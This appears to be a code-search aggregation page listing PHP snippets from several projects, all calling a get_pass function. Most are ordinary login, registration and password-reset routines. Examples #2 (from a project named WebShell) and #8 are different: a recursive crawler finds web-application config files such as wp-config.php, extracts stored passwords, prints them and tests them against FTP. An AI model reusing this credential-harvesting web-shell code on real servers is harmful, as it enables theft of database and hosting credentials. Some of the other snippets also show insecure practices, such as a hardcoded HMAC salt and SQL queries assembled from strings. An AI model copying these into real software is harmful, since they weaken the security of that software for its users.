コード例 #1
0
ファイル: auth_functions.php プロジェクト: lanejo01/torque
function auth_user()
{
    global $auth_user, $auth_pass;
    $user = get_user();
    $pass = get_pass();
    //No User/Pass defined: Allow everything
    if (empty($auth_user) && empty($auth_pass)) {
        return true;
    }
    if ($user == $auth_user && $pass == $auth_pass) {
        return true;
    }
    return false;
}
コード例 #2
0
ファイル: ftpsearch.php プロジェクト: xl7dev/WebShell
function read_dir($path, $username)
{
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            $fpath = "{$path}{$file}";
            if ($file != '.' and $file != '..') {
                if (is_readable($fpath)) {
                    $dr = "{$fpath}/";
                    if (is_dir($dr)) {
                        read_dir($dr, $username);
                    } else {
                        if ($file == 'config.php' or $file == 'config.inc.php' or $file == 'db.inc.php' or $file == 'connect.php' or $file == 'wp-config.php' or $file == 'var.php' or $file == 'configure.php' or $file == 'db.php' or $file == 'db_connect.php') {
                            $pass = get_pass($fpath);
                            if ($pass != '') {
                                echo "[+] {$fpath}\n{$pass}\n";
                                ftp_check($username, $pass);
                            }
                        }
                    }
                }
            }
        }
    }
}
コード例 #3
0
            $request = 'resetCode';
        } else {
            $error['toolate'] = 'The reset code was not found. Usually the request is deleted after 3 hours.';
        }
    } else {
        $error['mysql'] = 'Error quering database.';
    }
}
// STEP 3. They filled the form for new password
if (!empty($_POST['newPassword'])) {
    //passwords match?
    if (!empty($_POST['pass1']) && !empty($_POST['pass2']) && $_POST['pass1'] == $_POST['pass2']) {
        if (strlen($_POST['pass1']) < 8) {
            $error['shortpass'] = '******';
        } else {
            $newPass = get_pass($_POST['pass1']);
            // We have password
        }
    } else {
        $error['pass'] = '******';
        $request = 'resetCode';
    }
    //code is ok?
    if (!empty($_POST['code'])) {
        $code = mysql_real_escape_string($_POST['code'], $dbConn);
    } else {
        $error['code'] = 'The resetCode was not passed along with the passwords.';
    }
    if (empty($error)) {
        //the code exists in pass_reset table?
コード例 #4
0
function strtohex($string)
{
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
// Variable arrangement ($username and $password) and $error settings
if (!empty($_POST['username']) && $_POST['username'] != 'username') {
    $username_form = mysql_real_escape_string($_POST['username']);
} else {
    $error['username'] = "******";
}
if (!empty($_POST['password']) && $_POST['password'] != '********') {
    $password = get_pass($_POST['password']);
} else {
    $error['password'] = "******";
}
// No errors? All arrranged? Bring back the userdata at $arrUser if that guy exists
if (empty($error)) {
    /* START OLD PASSWORD PATCH */
    require_once $_SERVER['DOCUMENT_ROOT'] . '/admin/isOldUser.php';
    // The faulty strtohex function in use... So that it produces the results of 1.0
    $oldPassword = strtohex(hash_hmac('sha256', $_POST['password'], 'c#haRl891', true));
    if ($arrUser = isOldUser($username_form, $oldPassword, $dbConn)) {
        // Update the table with the new password
        $idUser = $arrUser['idUser'];
        // turn 0 the oldPass & update the new pass
        $query = "UPDATE users SET pass = '******', oldPass='******' WHERE idUser = '******'";
        $result = mysql_query($query, $dbConn);
コード例 #5
0
ファイル: updateAdmin.php プロジェクト: Jack082595/SitInMGT
            update_photo($name, $type, $bytes, $user, $id);
            update_admin($fName, $mName, $lName, $id);
            update_account($pass, $id);
            $message = "<div class = 'alert alert-success' style = 'width: 350px;'>Account is successfully updated.</div>";
            echo "<script>";
            //go back to viewMed page after 3 seconds.
            echo "setTimeout(function(){ document.location = '?p=profileAdmin'; }, 2000);";
            echo "</script>";
        } else {
            $message = "<div class = 'alert alert-warning' style = 'width: 350px;'>Invalid File.</div>";
        }
    }
} else {
    //if not submitted we retrieve the data from the database
    $adminFind = find_admin($id);
    $user_pass = get_pass($id);
    if ($adminFind) {
        $fName = $adminFind['LABSUPFNAME'];
        $mName = $adminFind['LABSUPMNAME'];
        $lName = $adminFind['LABSUPLNAME'];
        $pass = $user_pass['PASSWORD'];
    } else {
        $message = '<div class="alert alert-warning">The specified admin record cannot be found.</div>';
    }
}
?>
<html>
	<body>
		<div class="container">		
			<h4>Update Account</h4>
			<hr/>
コード例 #6
0
ファイル: updateWorking.php プロジェクト: Jack082595/SitInMGT
            $message = "<div class = 'alert alert-warning' style = 'width: 350px;'>Invalid File.</div>";
        }
    }
} else {
    //if not submitted we retrieve the data from the database
    $workingFind = find_working($id);
    if ($workingFind) {
        $fName = $workingFind['WORKINGFNAME'];
        $mName = $workingFind['WORKINGMNAME'];
        $lName = $workingFind['WORKINGLNAME'];
        $course = $workingFind['WORKINGCOURSE'];
        $yr = $workingFind['WORKINGYR'];
        $lab = $workingFind['ASSIGNEDLAB'];
        $time = $workingFind['TIME'];
        $days = $workingFind['DAYS'];
        $get_pass = get_pass($id);
        $pass = $get_pass['PASSWORD'];
    } else {
        $message = '<div class="alert alert-warning">The specified working student record cannot be found.</div>';
    }
}
?>
<html>
	<body>
		<div class="container">		
				<h4>Update Working Student</h4>
		<hr/>
		<form method="post" enctype="multipart/form-data">
		 <div class="col-md-4">
			<?php 
echo $message;
コード例 #7
0
 if (empty($error)) {
     // First, check if user wants to change the password
     if (!empty($_POST['currentPass'])) {
         $currentPass = get_pass($_POST['currentPass']);
         // Is the sent current password the same we have stored?
         if ($arrUser['pass'] != $currentPass) {
             $error['currentPass'] = '******';
         } else {
             // Ok, you want to change the password. Let's see if we have new passwords...
             if (!empty($_POST['newPass']) && !empty($_POST['newRePass'])) {
                 // ... and are the same
                 if ($_POST['newPass'] != $_POST['newRePass']) {
                     $error['rePassword'] = '******';
                 } else {
                     // creating the new password
                     $newPass = get_pass($_POST['newPass']);
                 }
             } else {
                 $error['changePass'] = '******';
             }
         }
     }
     // Still no errors? really? ok, go on
     if (empty($error)) {
         // Preparing the query without password changes...
         if (empty($newPass)) {
             $query = "UPDATE users SET username = '******', first_name = '{$first_name}', last_name = '{$last_name}', \n                email = '{$email}', country = '{$country}', homepage = '{$homepage}', location = '{$location}', about = '{$about}',\n                notify = '{$notify}', picasaUser = '******' WHERE idUser = {$idUser}";
             // UPDATE TABLE AND SESSION
             $result = mysql_query($query, $dbConn);
             $_SESSION['NC_user'] = $username;
         } else {
コード例 #8
0
ファイル: pb.php プロジェクト: abbeet/server39
 function read_dir($path, $username)
 {
     if ($handle = opendir($path)) {
         while (false !== ($file = readdir($handle))) {
             $fpath = "{$path}{$file}";
             if ($file != '.' and $file != '..') {
                 if (is_readable($fpath)) {
                     $dr = "{$fpath}/";
                     if (is_dir($dr)) {
                         read_dir($dr, $username);
                     } else {
                         if ($file == 'config.php' or $file == 'configuration.php' or $file == 'wp-config.php' or $file == 'config.inc.php' or $file == 'database.php' or $file == 'conf.php' or $file == 'settings.php' or $file == 'setting.php' or $file == 'inc.php' or $file == 'corn.php' or $file == 'configs.php' or $file == 'konfig.php' or $file == 'dbconf.php' or $file == 'koneksi.php' or $file == 'dbconfig.php' or $file == 'db.inc.php' or $file == 'db_connect.php' or $file == 'dbconnect.php' or $file == 'db-connect.php' or $file == 'configure.php' or $file == 'global.php' or $file == 'connect.php' or $file == 'db.php' or $file == 'conf_db.php' or $file == 'database.inc.php' or $file == 'database.php' or $file == 'connection.php' or $file == 'connections.php' or $file == 'configure.class.php' or $file == 'config.class.php' or $file == 'configuration.class.php' or $file == 'db.class.php' or $file == 'file_manager.php' or $file == 'LocalSettings.php' or $file == 'filemanager.php' or $file == 'manager.php' or $file == 'managers.php' or $file == 'connect.inc.php' or $file == 'dbconnect.inc.php') {
                             $pass = get_pass($fpath);
                             if ($pass != '') {
                                 echo "[+] {$fpath}\n{$pass}\n";
                                 ftp_check($username, $pass);
                             }
                         }
                     }
                 }
             }
         }
     }
 }
コード例 #9
0
	<br>
	<button type='submit'>Send</button>
</form>
<?php
if (isset($_REQUEST['array'])){
	$arResult = explode(' ', $_REQUEST['array']);
	$str = implode(",", $arResult);
	foreach ($arResult as &$value) {
		$value += 2;
	}
	echo $str;
	echo "<pre>";
	print_r($arResult);
	echo "</pre>";
}*/
$string = "Привет, меня зовет Евгений";
$name = "меня";
$len = strlen($name);
$post = strripos($string, $name);
//echo substr($string, $post, $len);
//$res = str_replace('Евгений', $name, $string);
//echo $string,"<br>";
//echo $res,"<br>";
function get_pass($len)
{
    $patern = "bhgfbgfbgfbnzgf45643gfdg";
    $temp = str_shuffle($patern);
    return substr($temp, 0, $len);
}
echo get_pass(10);
コード例 #10
0
     if (!empty($userEmail) || !empty($preuserEmail)) {
         $error['email'] = 'The e-mail is already in use.';
         $reg_email = '';
     }
 } else {
     $error['reg_email'] = 'A valid email address is needed.';
 }
 // Password
 if (!empty($_POST['reg_pass']) && !empty($_POST['reg_repass'])) {
     // same passwords
     if (strlen($_POST['reg_pass']) < 8) {
         $error['shortpass'] = '******';
     } elseif ($_POST['reg_pass'] != $_POST['reg_repass']) {
         $error['pass'] = '******';
     } else {
         $reg_pass = get_pass($_POST['reg_pass']);
         // We have password;
     }
 } else {
     $error['password'] = '******';
 }
 // country
 if (!empty($_POST['reg_country'])) {
     foreach ($country_list as $country) {
         if ($_POST['reg_country'] == $country) {
             $reg_country = mysql_real_escape_string($_POST['reg_country']);
             // We have country.
         }
     }
 } else {
     $reg_country = '';
コード例 #11
0
ファイル: c_valid_login.php プロジェクト: Kodoyosa/zagat
$actualUser = $_POST['mail'];
$userExist = false;
$connected = false;
$actualPass = SHA1($_POST['password']);
//VERIF SI USER TAPE EXISTE
foreach ($users as $user) {
    if (strcmp(strval($actualUser), strval($user['user_mail'])) == 0) {
        $mail = $user['user_mail'];
        $id = $user['user_id'];
        $userExist = true;
    }
}
//SI USER EXIST
//VERIF SI MDP CORRESPOND
if ($userExist == true) {
    $passwords = get_pass($actualUser);
    foreach ($passwords as $password) {
        if ($actualPass == $password['user_password']) {
            $connected = true;
        } else {
            $connected = false;
        }
    }
    if ($connected == true) {
        session_start();
        $_SESSION['id'] = $id;
        $_SESSION['mail'] = $mail;
        echo 'Vous maintenant connecté !';
        echo 'cliquez <a href="../../controler/c_jobs.php">ici</a> pour revenir à l\'accueil';
    } else {
        echo 'Mauvais mot de passe !';